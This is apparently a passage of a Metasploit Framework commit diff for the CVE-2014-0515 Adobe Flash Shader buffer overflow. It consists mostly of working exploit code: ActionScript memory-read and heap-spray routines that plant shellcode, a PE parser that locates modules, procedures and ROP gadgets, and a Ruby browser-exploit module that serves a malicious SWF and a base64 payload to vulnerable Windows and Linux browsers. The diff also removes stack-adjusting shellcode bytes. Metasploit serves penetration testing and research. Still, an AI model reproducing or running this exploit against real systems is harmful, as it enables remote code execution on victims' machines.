return ([memory_protect_ptr, _local_6]);
};
if (content_before == 0xff016a04)
{
return ([memory_protect_ptr, _local_6]);
};
_local_6 = (memory_protect_ptr - 6);
while (1)
{
index--;
content = vector[index];
if (content == 0x850ff50)
{
if (uint(vector[(index + 1)]) == 0x5e0cc483)
{
offset = 0;
break;
};
};
content = (content & 0xFFFFFF00);
if (content == 0x50FF5000)
{
if (uint(vector[(index + 1)]) == 0xcc48308)
{
offset = 1;
break;
};
};
content = (content & 0xFFFF0000);
if (content == 0xFF500000)
{
if (uint(vector[(index + 1)]) == 0xc4830850)
{
if (uint(vector[(index + 2)]) == 0xc35d5e0c)
{
offset = 2;
break;
};
};
};
content = (content & 0xFF000000);
if (content == 0x50000000)
{
if (uint(vector[(index + 1)]) == 0x830850ff)
{
if (uint(vector[(index + 2)]) == 0x5d5e0cc4)
{
offset = 3;
break;
};
};
};
};
memory_protect_ptr = ((vector_address + (4 * index)) + offset);
return ([memory_protect_ptr, _local_6]);
}
// vector: vector with tweaked length
// address: memory address of vector data
function find_file_ref_vtable(vector:*, address:*):uint{
var allocation:uint = this.read_memory(vector, address, ((address & 0xFFFFF000) + 0x1c));
// Find an allocation of size 0x2a0
var allocation_size:uint;
while (true)
{
allocation_size = this.read_memory(vector, address, (allocation + 8));
if (allocation_size == 0x2a0) break;
if (allocation_size < 0x2a0)
{
allocation = (allocation + 0x24); // next allocation
} else
{
allocation = (allocation - 0x24); // prior allocation
};
};
var allocation_contents:uint = this.read_memory(vector, address, (allocation + 0xc));
while (true)
{
if (this.read_memory(vector, address, (allocation_contents + 0x180)) == 0xFFFFFFFF) break;
if (this.read_memory(vector, address, (allocation_contents + 0x17c)) == 0xFFFFFFFF) break;
allocation_contents = this.read_memory(vector, address, (allocation_contents + 8));
};
return (allocation_contents);
}
// Returns pointer to the nops in one of the allocated code vectors
function findCodeVector(vector:*, vector_address:*, mark:*):uint{
var allocation_size:uint;
var allocation:uint = this.read_memory(vector, vector_address, ((vector_address & 0xFFFFF000) + 0x1c));
while (true)
{
allocation_size = this.read_memory(vector, vector_address, (allocation + 8));
if (allocation_size == 0x7f0) break; // Code Vector found
allocation = (allocation + 0x24); // next allocation
};
// allocation contents should be the vector code, search for the mark 0x45454545
var allocation_contents:uint = this.read_memory(vector, vector_address, (allocation + 0xc));
while (true)
{
if (this.read_memory(vector, vector_address, (allocation_contents + 0x28)) == mark) break;
allocation_contents = this.read_memory(vector, vector_address, (allocation_contents + 8)); // next allocation
};
return ((allocation_contents + 0x2c));
}
// create 8 vectors of size 0x7f0 inside an array to place shellcode
function createCodeVectors(mark:uint, nops:uint){
var code_vectors_array:Array = new Array();
var i:* = 0;
while (i < 8)
{
code_vectors_array[i] = new Vector.<uint>(((0x7f0 / 4) - 8)); // new Vector.<uint>(0x1f4)
code_vectors_array[i][0] = mark; // 0x45454545 // inc ebp * 4
code_vectors_array[i][1] = nops; // 0x90909090 // nop * 4
i++;
};
return (code_vectors_array);
}
// Fill with the code vectors with the shellcode
function fillCodeVectors(array_code_vectors:Array) {
var i:uint = 0;
var sh:uint=1;
while(i < array_code_vectors.length)
{
for(var u:String in shellcodeObj)
{
array_code_vectors[i][sh++] = Number(shellcodeObj[u]);
}
i++;
sh = 1;
}
}
}
}//package

10
external/source/exploits/CVE-2014-0515/GraphShadLinux.as vendored Executable file
View File

@ -0,0 +1,10 @@
package
{
import mx.core.ByteArrayAsset;
[Embed(source="binary_data_linux", mimeType="application/octet-stream")]
public class GraphShadLinux extends ByteArrayAsset
{
}
}

10
external/source/exploits/CVE-2014-0515/GraphShadWindows.as vendored Executable file
View File

@ -0,0 +1,10 @@
package
{
import mx.core.ByteArrayAsset;
[Embed(source="binary_data_windows", mimeType="application/octet-stream")]
public class GraphShadWindows extends ByteArrayAsset
{
}
}

10
external/source/exploits/CVE-2014-0515/Graph_Shad.as vendored
View File

@ -1,10 +0,0 @@
package
{
import mx.core.ByteArrayAsset;
[Embed(source="binary_data", mimeType="application/octet-stream")]
public class Graph_Shad extends ByteArrayAsset
{
}
}

32
external/source/exploits/CVE-2014-0515/Logger.as vendored Executable file
View File

@ -0,0 +1,32 @@
package
{
import flash.external.ExternalInterface
public class Logger {
private static const DEBUG:uint = 1
public static function alert(msg:String):void
{
var str:String = "";
if (DEBUG == 1)
str += msg;
if(ExternalInterface.available){
ExternalInterface.call("alert", str);
}
}
public static function log(msg:String):void
{
var str:String = "";
if (DEBUG == 1)
str += msg;
if(ExternalInterface.available){
ExternalInterface.call("console.log", str);
}
}
}
}

72
external/source/exploits/CVE-2014-0515/PE.as vendored Normal file
View File

@ -0,0 +1,72 @@
package
{
public class PE
{
private var eba:ExploitByteArray
public function PE(ba:ExploitByteArray)
{
eba = ba
}
public function base(addr:uint):uint
{
addr &= 0xffff0000
while (true) {
if (eba.read(addr) == 0x00905a4d) return addr
addr -= 0x10000
}
return 0
}
public function module(name:String, addr:uint):uint
{
var iat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x80), i:int = -1
var mod_name:String
while (true) {
var entry:uint = eba.read(iat + (++i) * 0x14 + 12)
if (!entry) throw new Error("FAIL!");
mod_name = eba.read_string(addr + entry, name.length)
if (mod_name.toUpperCase() == name.toUpperCase()) break
}
return base(eba.read(addr + eba.read(iat + i * 0x14 + 16)))
}
public function procedure(name:String, addr:uint):uint
{
var eat:uint = addr + eba.read(addr + eba.read(addr + 0x3c) + 0x78)
var numberOfNames:uint = eba.read(eat + 0x18)
var addressOfFunctions:uint = addr + eba.read(eat + 0x1c)
var addressOfNames:uint = addr + eba.read(eat + 0x20)
var addressOfNameOrdinals:uint = addr + eba.read(eat + 0x24)
var proc_name:String
for (var i:uint = 0; ; i++) {
var entry:uint = eba.read(addressOfNames + i * 4)
proc_name = eba.read_string(addr + entry, name.length + 2)
if (proc_name.toUpperCase() == name.toUpperCase()) break
}
return addr + eba.read(addressOfFunctions + eba.read(addressOfNameOrdinals + i * 2, "word") * 4)
}
public function gadget(gadget:String, hint:uint, addr:uint):uint
{
var find:uint = 0
var contents:uint = 0
var limit:uint = eba.read(addr + eba.read(addr + 0x3c) + 0x50)
var value:uint = parseInt(gadget, 16)
for (var i:uint = 0; i < limit - 4; i++) {
contents = eba.read(addr + i)
if (hint == 0xffffffff && value == contents) {
return addr + i
}
if (hint != 0xffffffff && value == (contents & hint)) {
return addr + i
}
}
throw new Error()
}
}
}

BIN
external/source/exploits/CVE-2014-0515/binary_data_linux vendored Executable file
View File

Binary file not shown.

0
external/source/exploits/CVE-2014-0515/binary_data → external/source/exploits/CVE-2014-0515/binary_data_windows vendored
View File

149
modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb Normal file
View File

@ -0,0 +1,149 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Shader Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
crafted data as its bytecode, as exploited in the wild in April 2014. This module
has been tested successfully on:
* Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182.
* Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182.
* Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.350
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2014-0515'],
['BID', '67092'],
['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],
['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.7.700.275')
return true if ver =~ /^12\./
return true if ver =~ /^13\./ && Gem::Version.new(ver) <= Gem::Version.new('13.0.0.182')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.350')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 28 2014',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end

50
modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
View File

@ -9,10 +9,13 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Module::Deprecated
deprecated(Date.new(2015, 8, 11), 'exploit/multi/browser/adobe_flash_uncompress_zlib_uaf')
def initialize(info={})
super(update_info(info,
'Name' => "Adobe Flash Player Shader Buffer Overflow",
'Name' => 'Adobe Flash Player Shader Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
vulnerability occurs in the flash.Display.Shader class, when setting specially
@ -36,16 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true,
'PrependEncoder' => stack_adjust
},
'DefaultOptions' =>
{
# Disabled by default to allow sessions on Firefox, still useful when exploiting IE
#'InitialAutoRunScript' => 'migrate -f',
'Retries' => false,
'EXITFUNC' => "thread"
'DisableNops' => true
},
'Platform' => 'win',
'BrowserRequirements' =>
@ -60,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Apr 28 2014",
'DisclosureDate' => 'Apr 28 2014',
'DefaultTarget' => 0))
end
@ -69,48 +63,34 @@ class Metasploit3 < Msf::Exploit::Remote
super
end
def stack_adjust
adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb
adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit
adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit
adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
adjust
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status("Sending SWF...")
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status("Sending HTML...")
tag = retrieve_tag(cli, request)
profile = get_profile(tag)
profile[:tried] = false unless profile.nil? # to allow request the swf
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
flash_payload = ""
get_payload(cli,target_info).unpack("V*").each do |i|
flash_payload << "0x#{i.to_s(16)},"
end
flash_payload.gsub!(/,$/, "")
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
platform_id = 'win'
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=flash_payload%>" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
@ -120,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def create_swf
path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )
path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0515', 'msf.swf' )
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf